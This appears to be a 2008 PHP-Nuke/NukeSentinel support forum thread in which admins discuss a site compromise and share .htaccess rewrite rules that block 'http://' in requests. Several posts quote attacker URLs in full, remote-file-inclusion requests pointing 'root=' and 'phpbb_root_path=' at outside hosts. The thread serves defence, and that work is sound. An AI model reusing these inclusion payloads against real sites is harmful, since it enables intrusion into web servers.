Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x
Author Message
zeromechanic
Hangin' Around


Joined: Dec 15, 2005
Posts: 40
Location: Netherlands

PostPosted: Mon Jan 21, 2008 7:27 pm Reply with quote

Probably a weak point in sentinel or patch.

A site is hacked, using phpnuke7.6pl3.* AND NukeSentinel 2.5.15

this is the link they used : Only registered users can see links on this board! Get registered or login! w.drunkenmastersguild.eu/modules/admin/admin.php?root=http://boludalnet.freehostia.com/57.gif?%22

unfortunately the user of the site deleted all of his access logs Shocked
this is all whats left.
asked the hoster if they can find anything in the serverlogs

upgradedb.sql and folder nsnst_installer in the screenshot where not on the server.
Also not in a backup file !!

Site is now replaced with latest RN en NS
waiting for them to try again.

thnx Zeromechanic

screenshot :
Image
 
View user's profile Send private message
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Mon Jan 21, 2008 8:10 pm Reply with quote

This looks strange - but you should first be very careful about what and how much information you post on a public site (no need to give more script kiddies an invitation).

I doubt it's a problem with Sentinel or a patch. Does the site have admin authentication on admin.php?

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Mon Jan 21, 2008 10:07 pm Reply with quote

I was just looking at your posting and puzzling too. Sentinel specifically looks for the "http" in a query string while it is filtering out XSS attacks and it should have found the one you posted. But then I looked at the address bar and it shows Coppermine. I've never used the product and can't testify from experience, but from what I've seen on these forums over the years, it introduces a number of security holes. That may be responsible for what you saw.
 
View user's profile Send private message Visit poster's website
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Tue Jan 22, 2008 1:10 am Reply with quote

I use these lines added in .htaccess to avoid cross scripting by hackers and it works very well:

RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]
 
View user's profile Send private message
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Tue Jan 22, 2008 3:28 am Reply with quote

You would need to determine if 'script blocking' was actually turned on in the NukeSentinel configuration.
Nuke Sentinel should have stopped that particular attack in any event BUT only if the relevant blocker is turned on.
The path suggests the attack originated from a compromised Coppermine gallery - again!
 
View user's profile Send private message Send e-mail
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Jan 22, 2008 10:27 am Reply with quote

I don't recognize the module being attacked
modules/admin/admin.php?root=

There is no such admin module in standard phpNuke.
Do you have a backup of the affected site somewhere (not public of course)?

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
zeromechanic
PostPosted: Wed Jan 23, 2008 12:01 am Reply with quote

indeed coppermine, but what i see its "included"in index.php?http://..........

they gained acces with the first link, and used the "coppermine" to access ftp, or something like that.

No serious damage was done btw.

also thought so that NS will block these strings. But good one about the "activating" of the blocker.
didn't think about that.

There should be a backup of the site, but dbase I dont't know
 
evaders99
PostPosted: Wed Jan 23, 2008 12:16 am Reply with quote

Well index.php? itself with no parameters should not be exploitable either, unless there was some weird code already there.

I don't mind looking at your backups, if you think it was indeed patched up-to-date.
 
zeromechanic
PostPosted: Wed Jan 23, 2008 4:17 pm Reply with quote

thnx,
All blockers where activated.

There is a backup, but not from the "hacked" site but from before the hack.

I will send the contact from the hosting to this topic.
 
evaders99
PostPosted: Wed Jan 23, 2008 6:31 pm Reply with quote

Send it to me by Private Message, you probably don't want it out-in-the-open.
The access logs would help, if you still had some references to them. But I guess since you said they were deleted, they are probably gone.
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Thu Jan 24, 2008 11:15 am Reply with quote

slackervaara wrote:
I use these lines added in .htaccess to avoid cross scripting by hackers and it works very well:

RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]


BTW, these do not work for me. I have a script which notifies me when certain errors codes are "hit" and the above should be stopping ALL of these query string Only registered users can see links on this board! Get registered or login! stuff from dropping into nuke at all.

Are you certain these are working for you? Are on Apache 2.x by chance?

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
evaders99
PostPosted: Thu Jan 24, 2008 6:01 pm Reply with quote

%{QUERY_STRING} fails for me .. I end up using %{THE_REQUEST}
 
slackervaara
PostPosted: Thu Jan 24, 2008 9:24 pm Reply with quote

It seems to work for me at least. My test server is Xampp 1.6.4 with apache 2.2.6, but I don't know the apache version of my web hotel, but I think its older.

When, I tested my test server I got forbidden error 403, when trying cross scripting, but no such error without this in .htaccess.

After I added this to my .htaccess on the web hotel, Sentinel have not been activated by cross scripting despite daily attempts according to the logs.
 
montego
PostPosted: Fri Jan 25, 2008 7:40 am Reply with quote

evaders99, thank you, thank you, thank you! I get hundreds of these attempts per day caught by a script of mine and so I should very quickly see if this stops them cold. I did test it just now and it seems to work finally. THANKS!
 
evaders99
PostPosted: Fri Jan 25, 2008 2:41 pm Reply with quote

I get hundreds of attempts too Wink
Now if I only had a filter for POST data, then I really could run everything in .htaccess rules
 
warren-the-ape
Worker
Worker


Joined: Nov 19, 2007
Posts: 196
Location: Netherlands

PostPosted: Fri Jan 25, 2008 4:50 pm Reply with quote

evaders99 wrote:
%{QUERY_STRING} fails for me .. I end up using %{THE_REQUEST}


Code:
RewriteEngine On


RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]


Hey that seems to work pretty nice, both thnx for sharing Very Happy
Btw, are there any major differences between using 'QUERY_STRING' or 'THE_REQUEST' ?
 
View user's profile Send private message
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Fri Jan 25, 2008 7:04 pm Reply with quote

So this stops the query before Sentinel even sees it, right? Are there any legitimate cases where you would have http: in a GET query that this blocks?

_________________
Only registered users can see links on this board! Get registered or login! - An Event Calendar for PHP-Nuke
Only registered users can see links on this board! Get registered or login! - A Google Maps Nuke Module 
View user's profile Send private message
slackervaara
PostPosted: Fri Jan 25, 2008 7:12 pm Reply with quote

I have had it for months on my system and I checks the logs on a daily basis, but I have not yet found any legimate case that have been blocked by this.
 
montego
PostPosted: Sat Jan 26, 2008 5:59 am Reply with quote

Gremmie wrote:
So this stops the query before Sentinel even sees it, right? Are there any legitimate cases where you would have http: in a GET query that this blocks?


Yes there is, but these functions are rarely used and there are work-arounds. For example, testing a submitted web link or download. There are other admin functions like these as well.

But, again, I'd rather stop these before even getting to php... Wink

BTW, Thanks again Evaders! You were right on the money with that change. THE_REQUEST has essentially killed around 80 notifications that I would have gotten...

worship
 
zeromechanic
PostPosted: Sat Jan 26, 2008 3:58 pm Reply with quote

With RN and NS .15 installed
Already stopped 58 hacking attempts.
Filter

This is the link they are trying:
w*w.drunkenmastersguild.eu/modules.php?name=News&file=article&sid=13//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://party4you.ch/new/id.txt?
 
Dawg
RavenNuke(tm) Development Team


Joined: Nov 07, 2003
Posts: 910

PostPosted: Sat Jan 26, 2008 6:15 pm Reply with quote

I have been HAMMERED by that one all night....
 
View user's profile Send private message
montego
PostPosted: Sun Jan 27, 2008 8:20 am Reply with quote

put these rewrite statements in your .htaccess (may have to run the rewrite engine on) as was mentioned above and these all disappear! I was literally getting upwards of hundreds. After putting those in. ZERO of these attacks getting to PHP.

RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]
 
redhairz
Worker
Worker


Joined: Nov 17, 2006
Posts: 222

PostPosted: Thu Feb 21, 2008 3:28 am Reply with quote

many thanks to all of you i am not so sure that this will work on mine but what the heck Smile)) thanks to the expert here

but my rewrite rule is this? can it work?
Code:
RewriteRule ^.*$ http://127.0.0.1 [R,L]  

_________________
Jesus is Alive, He is our joy, be it good times or bad time. 
View user's profile Send private message
evaders99
PostPosted: Thu Feb 21, 2008 7:43 am Reply with quote

Sure, Only registered users can see links on this board! Get registered or login! will just bounce the request back to user. - (hyphen) will just kill further processing with no response. Either way is fine.
 
redhairz
PostPosted: Tue Feb 26, 2008 2:13 am Reply with quote

thanks evaders i just wanted to stop their silly act. Smile
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©